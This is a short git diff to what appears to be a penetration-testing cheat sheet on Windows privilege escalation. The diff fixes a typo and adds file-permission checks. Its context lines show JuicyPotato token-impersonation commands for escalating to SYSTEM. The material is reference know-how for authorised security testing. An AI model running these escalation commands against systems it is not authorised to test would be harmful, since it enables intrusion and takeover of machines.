diff --git a/README.md b/README.md index 84f0089..f5144be 100644 --- a/README.md +++ b/README.md @@ -1029,11 +1029,15 @@ net user {USERNAME} # Check UAC level whoami /groups -# Check Privledges for Impersonation +# Check Privileges for Impersonation whoami /priv JuicyPotato.exe -t * -p {run.exe} -l 8003 JuicyPotato.exe -t * -p {run.exe} -l 8003 -c {CLSID} +# Check File Permissions +Get-ACL {FILE or DIR} | fl +icacls {FILE} + # Powershell cmd /c "JuicyPotato.exe -t * -p run.exe -l 8003 -c {CLSID}"